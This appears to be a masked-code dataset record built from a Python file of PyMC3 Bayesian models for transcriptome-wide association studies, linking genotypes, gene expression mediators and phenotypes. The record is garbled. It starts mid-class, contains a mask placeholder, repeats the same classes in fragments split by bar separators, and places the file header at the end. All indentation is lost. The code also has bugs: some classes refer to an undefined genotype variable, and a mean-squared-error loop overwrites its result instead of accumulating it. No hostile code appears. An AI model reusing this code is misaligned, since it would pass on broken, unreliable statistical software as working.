def __init__(self, mediator_mu, mediator_sd, m_laplace_beta=1,
p_sigma_beta=10, *args, **kwargs):
self.name = 'MeasurementError'
self.cv_vars = ['gwas_phen', 'gwas_gen']
self.vars = {'mediator_mu': mediator_mu, 'mediator_sd': mediator_sd,
'p_sigma_beta': p_sigma_beta}
super(MeasurementError, self).__init__(*args, **kwargs)
def create_model(self, gwas_mediator, gwas_phen, gwas_error):
n_samples = gwas_mediator.eval().shape[0]
with pm.Model() as phenotype_model:
mediator = pm.Normal('mediator', mu=self.vars['mediator_mu'],
sd=self.vars['mediator_sd'], shape=n_samples)
mediator_meas = pm.Normal('mediator_meas', mu=mediator, sd=
gwas_error, shape=n_samples, observed=gwas_mediator)
intercept = pm.Normal('intercept', mu=0, sd=1)
alpha = pm.Uniform('alpha', lower=-10, upper=10)
phenotype_sigma = pm.HalfCauchy('phenotype_sigma', beta=self.
vars['p_sigma_beta'])
phenotype_mu = intercept + alpha * mediator
phen = pm.Normal('phen', mu=phenotype_mu, sd=phenotype_sigma,
observed=gwas_phen)
if self.variational and self.mb:
self.minibatch_RVs = [phen]
self.minibatch_tensors = [gwas_gen, gwas_phen]
return phenotype_model
class MeasurementErrorBF(BayesianModel):
"""
Use the canonical definition of measurement error as described
in http://andrewgelman.com/2016/09/04/29847/
"""
def __init__(self, mediator_mu, mediator_sd, precomp_med=True,
heritability=0.1, p_sigma_beta=10, *args, **kwargs):
self.name = 'MeasurementErrorBF'
self.cv_vars = ['gwas_phen', 'gwas_gen']
self.vars = {'mediator_mu': mediator_mu, 'mediator_sd': mediator_sd,
'heritability': heritability, 'p_sigma_beta': p_sigma_beta,
'precomp_med': precomp_med}
super(MeasurementErrorBF, self).__init__(*args, **kwargs)
def create_model(self, gwas_mediator, gwas_phen, gwas_error):
n_samples = gwas_mediator.eval().shape[0]
with pm.Model() as phenotype_model:
mediator = pm.Normal('mediator', mu=self.vars['mediator_mu'],
sd=self.vars['mediator_sd'], shape=n_samples)
mediator_meas = pm.Normal('mediator_meas', mu=mediator, sd=
gwas_error, shape=n_samples, observed=gwas_mediator)
intercept = pm.Normal('intercept', mu=0, sd=1)
phenotype_sigma = pm.HalfCauchy('phenotype_sigma', beta=self.
vars['p_sigma_beta'])
if self.vars['precomp_med']:
p_var = t.sqr(phenotype_sigma)
h = self.vars['heritability']
var_explained = p_var * h / (1 - h)
md_var = np.square(np.mean(self.vars['mediator_sd']))
md_mean_sq = np.square(np.mean(self.vars['mediator_mu']))
var_alpha = var_explained / (md_var + md_mean_sq)
alpha = pm.Normal('alpha', mu=0, sd=t.sqrt(var_alpha))
else:
p_var = t.sqr(phenotype_sigma)
h = self.vars['heritability']
var_explained = p_var * h / (1 - h)
md_var = t.var(mediator)
md_mean_sq = t.sqr(t.mean(mediator))
var_alpha = var_explained / (md_var + md_mean_sq)
alpha = pm.Normal('alpha', mu=0, sd=t.sqrt(var_alpha))
p = np.array([0.5, 0.5])
mediator_model = pm.Bernoulli('mediator_model', p[1])
phenotype_mu_null = intercept
phenotype_mu_mediator = intercept + alpha * mediator
phen = pm.DensityDist('phen', lambda value: pm.switch(
mediator_model, pm.Normal.dist(mu=phenotype_mu_mediator, sd
=phenotype_sigma).logp(value), pm.Normal.dist(mu=
phenotype_mu_null, sd=phenotype_sigma).logp(value)),
observed=gwas_phen)
self.steps = [pm.BinaryGibbsMetropolis(vars=[mediator_model]),
pm.Metropolis()]
if self.variational and self.mb:
self.minibatch_RVs = [phen]
self.minibatch_tensors = [gwas_gen, gwas_phen]
return phenotype_model
| <mask token>
class BayesianModel(object):
"""
General Bayesian Model Class for quantifying
relationship between gene and phenotype
Adapted from Thomas Wiecki
https://github.com/pymc-devs/pymc3/issues/511#issuecomment-125935523
"""
def __init__(self, variational=True, mb=False, n_chain=50000, n_trace=
5000, logistic=False, steps=None):
"""
Args:
variational (bool, optional): Use Variational Inference
mb (bool, optional): Use minibatches
"""
self.variational = variational
self.cached_model = None
self.mb = mb
self.n_chain = n_chain
self.n_trace = n_trace
self.logistic = logistic
self.steps = steps
def cache_model(self, **inputs):
"""
Create a cached model for the Bayesian model using
shared theano variables for each Bayesian
input parameter.
Args:
**inputs (dict): inputs for Bayesian model
"""
self.shared_vars = self._create_shared_vars(**inputs)
self.cached_model = self.create_model(**self.shared_vars)
def create_model(self, **inputs):
"""
Each instance of this class needs to define
their PYMC3 model in here.
"""
raise NotImplementedError('This method has to be overwritten.')
def _create_shared_vars(self, **inputs):
"""
For each input variable, create theano shared variable
and set their initial values.
Args:
**inputs (dict): inputs for Bayesian model
Returns:
dict: key, value - var_name, theano.shared variable
"""
shared_vars = {}
for name, data in inputs.items():
shared_vars[name] = shared(data, name=name)
return shared_vars
def _clean_inputs(self, inputs):
"""
Clean the inputs, i.e. remove some
genotype columns. Useful for some class of Bayesian models
such as Two-Stage, where first stage involves filtering
on certain SNPs.
Args:
inputs (dict): inputs for Bayesian model
Returns:
dict: cleaned inputs for Bayesian model
"""
return inputs
def run(self, **inputs):
"""
Run cached Bayesian model using the inputs
Args:
**inputs (dict): inputs for Bayesian model
Returns:
trace: Trace of the PyMC3 inference
"""
if self.cached_model is None:
self.cache_model(**inputs)
for name, data in inputs.items():
self.shared_vars[name].set_value(data)
if self.mb and self.variational:
self.minibatches = zip(self._mb_generator(inputs['gwas_gen']),
self._mb_generator(inputs['gwas_phen']))
self.trace = self._inference()
return self.trace
def _inference(self, n_trace=None):
"""
Perform the inference. Uses ADVI if self.variational
is True. Also, uses minibatches is self.mb=True based
on generators defined in self.run.
Otherwise, uses Metropolis.
Args:
n_trace (int, optional): Number of steps used for trace
Returns:
trace: Trace of the PyMC3 inference
"""
if n_trace is None:
n_trace = self.n_trace
with self.cached_model:
if self.variational:
if self.mb:
v_params = pm.variational.advi_minibatch(n=self.n_chain,
minibatch_tensors=self.minibatch_tensors,
minibatch_RVs=self.minibatch_RVs, minibatches=self.
minibatches)
else:
v_params = pm.variational.advi(n=self.n_chain)
trace = pm.variational.sample_vp(v_params, draws=n_trace)
self.v_params = v_params
else:
if self.steps is None:
self.steps = pm.Metropolis()
start = pm.find_MAP(fmin=optimize.fmin_powell)
trace = pm.sample(self.n_chain, step=self.steps, start=
start, progressbar=True)
trace = trace[-n_trace:]
self.trace = trace
return trace
def cross_validation(self, k_folds, **inputs):
"""
Run cross-validation on the inputs and calculate
statistics for each fold test set.
Args:
k_folds (sklearn.cross_validation): Folds of test and train
samples
**inputs (dict): inputs for Bayesian model
Returns:
dict: statistics for each fold
"""
self.cv_stats, self.cv_traces = [], []
self.k_folds = k_folds
inputs = self._clean_inputs(inputs)
for i, fold in enumerate(k_folds):
train, test = fold
input_train, input_test = {}, {}
for name, data in inputs.items():
if name in self.cv_vars:
input_train[name] = data[train]
input_test[name] = data[test]
else:
input_train[name] = data
input_test[name] = data
trace = self.run(**input_train)
stats = self.calculate_statistics(trace, **input_test)
self.cv_traces.append(trace)
self.cv_stats.append(stats)
return self.cv_traces, self.cv_stats
def calculate_ppc(self, trace):
"""
Calculate several post-predictive checks
based on the trace.
"""
dic = pm.stats.dic(trace, self.cached_model)
waic, log_py, logp = calculate_waic(trace, self.cached_model)
mu, sd, zscore = self._alpha_stats(trace)
return {'dic': dic, 'waic': waic, 'logp': logp, 'mu': mu, 'sd': sd,
'zscore': zscore}
def calculate_statistics(self, trace, **input_test):
"""
Calculate mse and logp statistics on a test set.
Args:
**input_test (dict): test set of inputs
trace (PyMC3.trace): Trace of the inference chain
Returns:
dict: logp and mse
"""
inputs = self._clean_inputs(input_test)
mc_logp = self._logp(trace, **inputs)
mean_mse = self._mse(trace, **inputs)
mse2 = self._mse2(trace, **inputs)
mu, sd, zscore = self._alpha_stats(trace)
return {'logp': mc_logp, 'mse': mean_mse, 'mse2': mse2, 'mu': mu,
'sd': sd, 'zscore': zscore}
def calculate_bf(self, trace, var_name='mediator_model'):
"""
Calculate Bayes Factor using a Bernoulli variable in the
trace.
"""
p_alt = trace[var_name].mean()
bayes_factor = p_alt / (1 - p_alt)
return bayes_factor
def _logp(self, trace, **inputs):
"""
Calculate log likelihood using Monte Carlo integration.
Args:
**inputs (dict): inputs used in likelhood calculation
trace (PyMC3.trace): Trace of the inference chain
Returns:
float: Log likelihood as estimated by Monte Carlo integration
"""
def calc_log(step):
exp_pred = np.dot(inputs['gwas_gen'], step['beta_med'].T).ravel()
phen_pred = step['alpha'] * exp_pred
phen_prob = norm.logpdf(x=inputs['gwas_phen'], loc=phen_pred,
scale=step['phenotype_sigma'])
return phen_prob
phen_probs = [calc_log(trace[idx]) for idx in np.random.randint(0,
len(self.trace), 500)]
phen_probs = np.asmatrix(phen_probs)
mc_logp = phen_probs.sum(axis=1).mean()
return mc_logp
def _mse(self, trace, **inputs):
"""
Calculate mean squared error of the model fit.
Args:
**inputs (dict): inputs used in likelhood calculation
trace (PyMC3.trace): Trace of the inference chain
Returns:
float: Mean squared error across all samples
"""
phen_mse = []
for idx in np.random.randint(0, len(trace), 500):
step = self.trace[idx]
exp_pred = np.dot(inputs['gwas_gen'], step['beta_med'].T).ravel()
phen_pred = step['alpha'] * exp_pred
phen_mse = np.mean((inputs['gwas_phen'] - phen_pred) ** 2)
mean_mse = np.mean(phen_mse)
return mean_mse
def _mse2(self, trace, **inputs):
"""
Calculate mean squared error of the model fit
using posterior means of beta_med instead of
sampling from it.
Args:
**inputs (dict): inputs used in likelhood calculation
trace (PyMC3.trace): Trace of the inference chain
Returns:
float: Mean squared error across all samples
"""
exp = np.dot(inputs['gwas_gen'], trace['beta_med'].mean(axis=0).T)
phen_pred = exp * trace['alpha'].mean()
mse = np.mean((inputs['gwas_phen'] - phen_pred) ** 2)
return mse
def _alpha_stats(self, trace):
"""
Calculate statistics of the alpha value in
the trace.
"""
mean = np.mean(trace['alpha'])
sd = np.std(trace['alpha'], ddof=1)
zscore = mean / sd
return mean, sd, zscore
def _mb_generator(self, data, size=500):
"""
Generator for minibatches
"""
rng = np.random.RandomState(0)
while True:
ixs = rng.randint(len(data), size=size)
yield data[ixs]
class TwoStage(BayesianModel):
"""
Two Stage Inference.
First stage: Bootstrapped ElasticNet
Second stage: Use loci that were learned in the first stage
and their mean and std as priors for a simple
Bayesian Linear Regression
Attributes:
"""
def __init__(self, coef_mean, coef_sd, p_sigma_beta=10, *args, **kwargs):
"""
Args:
"""
self.name = 'TwoStage'
self.cv_vars = ['gwas_phen', 'gwas_gen']
self.vars = {'coef_mean': coef_mean, 'coef_sd': coef_sd,
'p_sigma_beta': p_sigma_beta}
super(TwoStage, self).__init__(*args, **kwargs)
def create_model(self, gwas_gen, gwas_phen):
"""
Simple Bayesian Linear Regression
Args:
gwas_gen (pandas.DataFrame): GWAS genotypes
gwas_phen (pandas.DataFrame): GWAS phenotypes
Returns:
pymc3.Model(): The Bayesian model
"""
n_ind, n_snps = gwas_gen.eval().shape
with pm.Model() as phenotype_model:
beta_med = pm.Normal('beta_med', mu=self.vars['coef_mean'], sd=
self.vars['coef_sd'], shape=(1, n_snps))
phenotype_expression_mu = pm.dot(beta_med, gwas_gen.T)
intercept = pm.Normal('intercept', mu=0, sd=1)
alpha = pm.Normal('alpha', mu=0, sd=1)
phenotype_mu = intercept + alpha * phenotype_expression_mu
if self.logistic:
p = tinvlogit(phenotype_mu)
phen = pm.Bernoulli('phen', p=p, observed=gwas_phen)
else:
phenotype_sigma = pm.HalfCauchy('phenotype_sigma', beta=
self.vars['p_sigma_beta'])
phen = pm.Normal('phen', mu=phenotype_mu, sd=
phenotype_sigma, observed=gwas_phen)
if self.variational and self.mb:
self.minibatch_RVs = [phen]
self.minibatch_tensors = [gwas_gen, gwas_phen]
return phenotype_model
class TwoStageBF(BayesianModel):
"""
Two Stage Inference.
First stage: Bootstrapped ElasticNet
Second stage: Use loci that were learned in the first stage
and their mean and std as priors for a simple
Bayesian Linear Regression
Attributes:
"""
def __init__(self, coef_mean, coef_sd, p_sigma_beta=10, *args, **kwargs):
"""
Args:
"""
self.name = 'TwoStageBF'
self.cv_vars = ['gwas_phen', 'gwas_gen']
self.vars = {'coef_mean': coef_mean, 'coef_sd': coef_sd,
'p_sigma_beta': p_sigma_beta}
super(TwoStageBF, self).__init__(*args, **kwargs)
def create_model(self, gwas_gen, gwas_phen):
"""
Simple Bayesian Linear Regression
Args:
gwas_gen (pandas.DataFrame): GWAS genotypes
gwas_phen (pandas.DataFrame): GWAS phenotypes
Returns:
pymc3.Model(): The Bayesian model
"""
n_ind, n_snps = gwas_gen.eval().shape
with pm.Model() as phenotype_model:
beta_med = pm.Normal('beta_med', mu=self.vars['coef_mean'], sd=
self.vars['coef_sd'], shape=(1, n_snps))
mediator = pm.dot(beta_med, gwas_gen.T)
intercept = pm.Normal('intercept', mu=0, sd=1)
alpha = pm.Normal('alpha', mu=0, sd=1)
phenotype_sigma = pm.HalfCauchy('phenotype_sigma', beta=self.
vars['p_sigma_beta'])
p = np.array([0.5, 0.5])
mediator_model = pm.Bernoulli('mediator_model', p[1])
phenotype_mu_null = intercept
phenotype_mu_mediator = intercept + alpha * mediator
phen = pm.DensityDist('phen', lambda value: pm.switch(
mediator_model, pm.Normal.dist(mu=phenotype_mu_mediator, sd
=phenotype_sigma).logp(value), pm.Normal.dist(mu=
phenotype_mu_null, sd=phenotype_sigma).logp(value)),
observed=gwas_phen)
self.steps = [pm.BinaryGibbsMetropolis(vars=[mediator_model]),
pm.Metropolis()]
if self.variational and self.mb:
self.minibatch_RVs = [phen]
self.minibatch_tensors = [gwas_gen, gwas_phen]
return phenotype_model
class Joint(BayesianModel):
"""
Jointly model the transcriptional regulation and
its effect on the phenotype.
"""
def __init__(self, model_type='laplace', coef_sd=None, coef_mean=None,
tau_beta=1, lambda_beta=1, m_sigma_beta=10, p_sigma_beta=10, *args,
**kwargs):
"""
Expression ~ N(Xeta, \\sigma_exp)
P(eta) ~ Horseshoe (tau_beta, lambda_beta)
P(\\sigma_exp) ~ HalfCauchy(m_sigma_beta)
Phenotype ~ N(Xetalpha, \\sigma_phen)
P(lpha) ~ Uniform(-10, 10)
P(\\sigma_phen) ~ HalfCauchy(p_sigma_beta)
Args:
tau_beta (int): P(eta) ~ Horseshoe (tau_beta, lambda_beta)
lambda_beta (int): P(eta) ~ Horseshoe (tau_beta, lambda_beta)
m_sigma_beta (int): P(\\sigma_exp) ~ HalfCauchy(m_sigma_beta)
p_sigma_beta (int): P(\\sigma_phen) ~ HalfCauchy(p_sigma_beta)
"""
self.name = 'Joint'
self.model_type = model_type
self.cv_vars = ['gwas_phen', 'gwas_gen']
self.vars = {'coef_mean': coef_mean, 'coef_sd': coef_sd, 'tau_beta':
tau_beta, 'lambda_beta': lambda_beta, 'm_sigma_beta':
m_sigma_beta, 'p_sigma_beta': p_sigma_beta}
if model_type == 'laplace':
self.create_model = self._create_model_laplace
elif model_type == 'horseshoe':
self.create_model = self._create_model_horseshoe
elif model_type == 'prior':
self.create_model = self._create_model_prior
else:
raise NotImplementedError('Unsupported model type')
super(Joint, self).__init__(*args, **kwargs)
def _create_model_prior(self, med_gen, med_phen, gwas_gen, gwas_phen):
"""
Args:
med_gen (pandas.DataFrame): Mediator genotypes
med_phen (pandas.DataFrame): Mediator phenotypes
gwas_gen (pandas.DataFrame): GWAS genotypes
gwas_phen (pandas.DataFrame): GWAS phenotypes
"""
n_snps = gwas_gen.eval().shape[1]
with pm.Model() as phenotype_model:
beta_med = pm.Normal('beta_med', mu=self.vars['coef_mean'], sd=
self.vars['coef_sd'], shape=(1, n_snps))
mediator_intercept = pm.Normal('mediator_intercept', mu=0, sd=1)
mediator_mu = mediator_intercept + pm.dot(beta_med, med_gen.T)
mediator_sigma = pm.HalfCauchy('mediator_sigma', beta=self.vars
['m_sigma_beta'])
mediator = pm.Normal('mediator', mu=mediator_mu, sd=
mediator_sigma, observed=med_phen)
intercept = pm.Normal('intercept', mu=0, sd=1)
alpha = pm.Normal('alpha', 0, 1)
phenotype_expression_mu = pm.dot(beta_med, gwas_gen.T)
phenotype_sigma = pm.HalfCauchy('phenotype_sigma', beta=self.
vars['p_sigma_beta'])
phenotype_mu = intercept + alpha * phenotype_expression_mu
phen = pm.Normal('phen', mu=phenotype_mu, sd=phenotype_sigma,
observed=gwas_phen)
if self.variational and self.mb:
self.minibatch_RVs = [phen]
self.minibatch_tensors = [gwas_gen, gwas_phen]
return phenotype_model
def _create_model_horseshoe(self, med_gen, med_phen, gwas_gen, gwas_phen):
"""
Args:
med_gen (pandas.DataFrame): Mediator genotypes
med_phen (pandas.DataFrame): Mediator phenotypes
gwas_gen (pandas.DataFrame): GWAS genotypes
gwas_phen (pandas.DataFrame): GWAS phenotypes
"""
n_snps = gwas_gen.eval().shape[1]
with pm.Model() as phenotype_model:
tau_beta = pm.HalfCauchy('tau_beta', beta=self.vars['tau_beta'])
lambda_beta = pm.HalfCauchy('lambda_beta', beta=self.vars[
'lambda_beta'], shape=(1, n_snps))
total_variance = pm.dot(lambda_beta * lambda_beta, tau_beta *
tau_beta)
beta_med = pm.Normal('beta_med', mu=0, tau=1 / total_variance,
shape=(1, n_snps))
mediator_intercept = pm.Normal('mediator_intercept', mu=0, sd=1)
mediator_mu = mediator_intercept + pm.dot(beta_med, med_gen.T)
mediator_sigma = pm.HalfCauchy('mediator_sigma', beta=self.vars
['m_sigma_beta'])
mediator = pm.Normal('mediator', mu=mediator_mu, sd=
mediator_sigma, observed=med_phen)
alpha = pm.Normal('alpha', 0, 1)
intercept = pm.Normal('intercept', mu=0, sd=1)
phenotype_expression_mu = pm.dot(beta_med, gwas_gen.T)
phenotype_sigma = pm.HalfCauchy('phenotype_sigma', beta=self.
vars['p_sigma_beta'])
phenotype_mu = intercept + alpha * phenotype_expression_mu
phen = pm.Normal('phen', mu=phenotype_mu, sd=phenotype_sigma,
observed=gwas_phen)
if self.variational and self.mb:
self.minibatch_RVs = [phen]
self.minibatch_tensors = [gwas_gen, gwas_phen]
return phenotype_model
def _create_model_laplace(self, med_gen, med_phen, gwas_gen, gwas_phen):
"""
Args:
med_gen (pandas.DataFrame): Mediator genotypes
med_phen (pandas.DataFrame): Mediator phenotypes
gwas_gen (pandas.DataFrame): GWAS genotypes
gwas_phen (pandas.DataFrame): GWAS phenotypes
"""
n_snps = gwas_gen.eval().shape[1]
with pm.Model() as phenotype_model:
beta_med = pm.Laplace('beta_med', mu=0, b=1, shape=(1, n_snps))
mediator_intercept = pm.Normal('mediator_intercept', mu=0, sd=1)
mediator_mu = mediator_intercept + pm.dot(beta_med, med_gen.T)
mediator_sigma = pm.HalfCauchy('mediator_sigma', beta=self.vars
['m_sigma_beta'])
mediator = pm.Normal('mediator', mu=mediator_mu, sd=
mediator_sigma, observed=med_phen)
intercept = pm.Normal('intercept', mu=0, sd=1)
alpha = pm.Normal('alpha', 0, 1)
phenotype_expression_mu = pm.dot(beta_med, gwas_gen.T)
phenotype_sigma = pm.HalfCauchy('phenotype_sigma', beta=self.
vars['p_sigma_beta'])
phenotype_mu = intercept + alpha * phenotype_expression_mu
phen = pm.Normal('phen', mu=phenotype_mu, sd=phenotype_sigma,
observed=gwas_phen)
if self.variational and self.mb:
self.minibatch_RVs = [phen]
self.minibatch_tensors = [gwas_gen, gwas_phen]
return phenotype_model
class MultiStudyMultiTissue(BayesianModel):
"""
Jointly model the transcriptional regulation and
its effect on the phenotype in multiple studies
and multiple tissues. Assume that tissues from the same
individual are independent given the genotypes i.e.
P(TisA, TisB | G) = P(TisA | G) P(TisB | G)
"""
def __init__(self, m_laplace_beta=1, m_sigma_beta=10, p_sigma_beta=10,
*args, **kwargs):
"""
Expression ~ N(Xeta, \\sigma_exp)
P(eta) ~ Horseshoe (tau_beta, lambda_beta)
P(\\sigma_exp) ~ HalfCauchy(m_sigma_beta)
Phenotype ~ N(Xetalpha, \\sigma_phen)
P(lpha) ~ Uniform(-10, 10)
P(\\sigma_phen) ~ HalfCauchy(p_sigma_beta)
Args:
tau_beta (int): P(eta) ~ Horseshoe (tau_beta, lambda_beta)
lambda_beta (int): P(eta) ~ Horseshoe (tau_beta, lambda_beta)
m_sigma_beta (int): P(\\sigma_exp) ~ HalfCauchy(m_sigma_beta)
p_sigma_beta (int): P(\\sigma_phen) ~ HalfCauchy(p_sigma_beta)
"""
self.name = 'MultiStudyMultiTissue'
self.cv_vars = ['gwas_phen', 'gwas_gen']
self.vars = {'m_laplace_beta': m_laplace_beta, 'm_sigma_beta':
m_sigma_beta, 'p_sigma_beta': p_sigma_beta}
super(MultiStudyMultiTissue, self).__init__(*args, **kwargs)
def set_idx(self, med_idx, gwas_idx):
self.med_idx = med_idx
self.gwas_idx = gwas_idx
return
def create_model(self, med_gen, med_phen, gwas_gen, gwas_phen):
n_snps = gwas_gen.eval().shape[1]
n_tissues = len(np.unique(self.med_idx))
n_studies = len(np.unique(self.gwas_idx))
with pm.Model() as phenotype_model:
beta_med = pm.Laplace('beta_med', mu=0, b=self.vars[
'm_laplace_beta'], shape=(1, n_snps))
mediator_intercept = pm.Normal('mediator_intercept', mu=0, sd=1,
shape=n_tissues)
mediator_gamma = pm.Uniform('mediator_gamma', lower=0, upper=1,
shape=n_tissues)
mediator_mu = mediator_intercept[self.med_idx] + mediator_gamma[
self.med_idx] * pm.dot(beta_med, med_gen.T)
mediator_sigma = pm.HalfCauchy('mediator_sigma', beta=self.vars
['m_sigma_beta'], shape=n_tissues)
mediator = pm.Normal('mediator', mu=mediator_mu, sd=
mediator_sigma[self.med_idx], observed=med_phen)
intercept = pm.Normal('intercept', mu=0, sd=1, shape=n_studies)
alpha_mu = pm.Normal('alpha_mu', mu=0, sd=1)
alpha_sd = pm.HalfCauchy('alpha_sd', beta=1)
alpha = pm.Normal('alpha', mu=alpha_mu, sd=alpha_sd, shape=
n_studies)
phenotype_expression_mu = pm.dot(beta_med, gwas_gen.T)
phenotype_sigma = pm.HalfCauchy('phenotype_sigma', beta=1,
shape=n_studies)
phen_mu = intercept[self.gwas_idx] + alpha[self.gwas_idx
] * phenotype_expression_mu
phen_sigma = phenotype_sigma[self.gwas_idx]
phen = pm.Normal('phen', mu=phen_mu, sd=phen_sigma, observed=
gwas_phen)
if self.variational and self.mb:
self.minibatch_RVs = [phen]
self.minibatch_tensors = [gwas_gen, gwas_phen]
return phenotype_model
class NonMediated(BayesianModel):
"""
Model the relationship between the genotype and
phenotype without any added information about the
mediator. Use it as a basis for getting
the null distribution under a mediation analysis.
"""
def __init__(self, g_laplace_beta=1, p_sigma_beta=10, *args, **kwargs):
self.name = 'NonMediated'
self.cv_vars = ['gwas_phen', 'gwas_gen']
self.vars = {'g_laplace_beta': g_laplace_beta, 'p_sigma_beta':
p_sigma_beta}
super(NonMediated, self).__init__(*args, **kwargs)
def create_model(self, gwas_gen, gwas_phen):
n_snps = gwas_gen.eval().shape[1]
with pm.Model() as phenotype_model:
beta = pm.Laplace('beta', mu=0, b=self.vars['g_laplace_beta'],
shape=(1, n_snps))
intercept = pm.Normal('intercept', mu=0, sd=1)
phenotype_sigma = pm.HalfCauchy('phenotype_sigma', beta=self.
vars['p_sigma_beta'])
phenotype_mu = intercept + pm.dot(beta, gwas_gen.T)
phen = pm.Normal('phen', mu=phenotype_mu, sd=phenotype_sigma,
observed=gwas_phen)
if self.variational and self.mb:
self.minibatch_RVs = [phen]
self.minibatch_tensors = [gwas_gen, gwas_phen]
return phenotype_model
class MeasurementError(BayesianModel):
"""
Use the canonical definition of measurement error as described
in http://andrewgelman.com/2016/09/04/29847/
"""
def __init__(self, mediator_mu, mediator_sd, m_laplace_beta=1,
p_sigma_beta=10, *args, **kwargs):
self.name = 'MeasurementError'
self.cv_vars = ['gwas_phen', 'gwas_gen']
self.vars = {'mediator_mu': mediator_mu, 'mediator_sd': mediator_sd,
'p_sigma_beta': p_sigma_beta}
super(MeasurementError, self).__init__(*args, **kwargs)
def create_model(self, gwas_mediator, gwas_phen, gwas_error):
n_samples = gwas_mediator.eval().shape[0]
with pm.Model() as phenotype_model:
mediator = pm.Normal('mediator', mu=self.vars['mediator_mu'],
sd=self.vars['mediator_sd'], shape=n_samples)
mediator_meas = pm.Normal('mediator_meas', mu=mediator, sd=
gwas_error, shape=n_samples, observed=gwas_mediator)
intercept = pm.Normal('intercept', mu=0, sd=1)
alpha = pm.Uniform('alpha', lower=-10, upper=10)
phenotype_sigma = pm.HalfCauchy('phenotype_sigma', beta=self.
vars['p_sigma_beta'])
phenotype_mu = intercept + alpha * mediator
phen = pm.Normal('phen', mu=phenotype_mu, sd=phenotype_sigma,
observed=gwas_phen)
if self.variational and self.mb:
self.minibatch_RVs = [phen]
self.minibatch_tensors = [gwas_gen, gwas_phen]
return phenotype_model
class MeasurementErrorBF(BayesianModel):
"""
Use the canonical definition of measurement error as described
in http://andrewgelman.com/2016/09/04/29847/
"""
def __init__(self, mediator_mu, mediator_sd, precomp_med=True,
heritability=0.1, p_sigma_beta=10, *args, **kwargs):
self.name = 'MeasurementErrorBF'
self.cv_vars = ['gwas_phen', 'gwas_gen']
self.vars = {'mediator_mu': mediator_mu, 'mediator_sd': mediator_sd,
'heritability': heritability, 'p_sigma_beta': p_sigma_beta,
'precomp_med': precomp_med}
super(MeasurementErrorBF, self).__init__(*args, **kwargs)
def create_model(self, gwas_mediator, gwas_phen, gwas_error):
n_samples = gwas_mediator.eval().shape[0]
with pm.Model() as phenotype_model:
mediator = pm.Normal('mediator', mu=self.vars['mediator_mu'],
sd=self.vars['mediator_sd'], shape=n_samples)
mediator_meas = pm.Normal('mediator_meas', mu=mediator, sd=
gwas_error, shape=n_samples, observed=gwas_mediator)
intercept = pm.Normal('intercept', mu=0, sd=1)
phenotype_sigma = pm.HalfCauchy('phenotype_sigma', beta=self.
vars['p_sigma_beta'])
if self.vars['precomp_med']:
p_var = t.sqr(phenotype_sigma)
h = self.vars['heritability']
var_explained = p_var * h / (1 - h)
md_var = np.square(np.mean(self.vars['mediator_sd']))
md_mean_sq = np.square(np.mean(self.vars['mediator_mu']))
var_alpha = var_explained / (md_var + md_mean_sq)
alpha = pm.Normal('alpha', mu=0, sd=t.sqrt(var_alpha))
else:
p_var = t.sqr(phenotype_sigma)
h = self.vars['heritability']
var_explained = p_var * h / (1 - h)
md_var = t.var(mediator)
md_mean_sq = t.sqr(t.mean(mediator))
var_alpha = var_explained / (md_var + md_mean_sq)
alpha = pm.Normal('alpha', mu=0, sd=t.sqrt(var_alpha))
p = np.array([0.5, 0.5])
mediator_model = pm.Bernoulli('mediator_model', p[1])
phenotype_mu_null = intercept
phenotype_mu_mediator = intercept + alpha * mediator
phen = pm.DensityDist('phen', lambda value: pm.switch(
mediator_model, pm.Normal.dist(mu=phenotype_mu_mediator, sd
=phenotype_sigma).logp(value), pm.Normal.dist(mu=
phenotype_mu_null, sd=phenotype_sigma).logp(value)),
observed=gwas_phen)
self.steps = [pm.BinaryGibbsMetropolis(vars=[mediator_model]),
pm.Metropolis()]
if self.variational and self.mb:
self.minibatch_RVs = [phen]
self.minibatch_tensors = [gwas_gen, gwas_phen]
return phenotype_model
| '''
Bayesian models for TWAS.
Author: Kunal Bhutani <[email protected]>
'''
from scipy.stats import norm
import pymc3 as pm
import numpy as np
from theano import shared
from scipy.stats.distributions import pareto
from scipy import optimize
import theano.tensor as t
def tinvlogit(x):
return t.exp(x) / (1 + t.exp(x))
def calculate_waic(trace, model=None, r_logp=True):
"""
Taken directly from PyMC3.
Reproduced to only take into account the phenotype and not mediator
variable when calculating logp.
Calculate the widely available information criterion and the effective
number of parameters of the samples in trace from model.
Read more theory here - in a paper by some of the
leading authorities on Model Selection - http://bit.ly/1W2YJ7c
"""
log_py = log_post_trace(trace, model)
lppd = np.sum(np.log(np.mean(np.exp(log_py), axis=0)))
p_waic = np.sum(np.var(log_py, axis=0))
if r_logp:
return -2 * lppd + 2 * p_waic, log_py, lppd
else:
return -2 * lppd + 2 * p_waic
def calculate_loo(trace=None, model=None, log_py=None):
"""
Taken directly from PyMC3.
Reproduced to only take into account the phenotype and not mediator
variable when calculating logp.
Calculates leave-one-out (LOO) cross-validation for out of sample
predictive model fit, following Vehtari et al. (2015).
Cross-validation is computed using Pareto-smoothed importance sampling.
Returns log pointwise predictive density calculated via
approximated LOO cross-validation.
"""
if log_py is None:
log_py = log_post_trace(trace, model)
# Importance ratios
r = 1. / np.exp(log_py)
r_sorted = np.sort(r, axis=0)
# Extract largest 20% of importance ratios and
# fit generalized Pareto to each
# (returns tuple with shape, location, scale)
q80 = int(len(log_py) * 0.8)
pareto_fit = np.apply_along_axis(lambda x: pareto.fit(x, floc=0),
0, r_sorted[q80:])
# Calculate expected values of the order statistics of the fitted Pareto
S = len(r_sorted)
M = S - q80
z = (np.arange(M) + 0.5) / M
expvals = map(lambda x: pareto.ppf(z, x[0], scale=x[2]), pareto_fit.T)
# Replace importance ratios with order statistics of fitted Pareto
r_sorted[q80:] = np.vstack(expvals).T
# Unsort ratios (within columns) before using them as weights
r_new = np.array([x[np.argsort(i)]
for x, i in zip(r_sorted,
np.argsort(r, axis=0))])
# Truncate weights to guarantee finite variance
w = np.minimum(r_new, r_new.mean(axis=0) * S**0.75)
loo_lppd = np.sum(np.log(np.sum(w * np.exp(log_py), axis=0) / np.sum(w, axis=0)))
return loo_lppd
def log_post_trace(trace, model):
'''
Taken directly from PyMC3.
Reproduced to only take into account the phenotype and not mediator
variable when calculating logp.
Calculate the elementwise log-posterior for the sampled trace.
'''
logp = np.hstack([obs.logp_elemwise(pt) for pt in trace]
for obs in model.observed_RVs if obs.__repr__() == 'phen')
if len(logp.shape) > 2:
logp = logp.squeeze(axis=1)
return logp
class BayesianModel(object):
'''
General Bayesian Model Class for quantifying
relationship between gene and phenotype
Adapted from Thomas Wiecki
https://github.com/pymc-devs/pymc3/issues/511#issuecomment-125935523
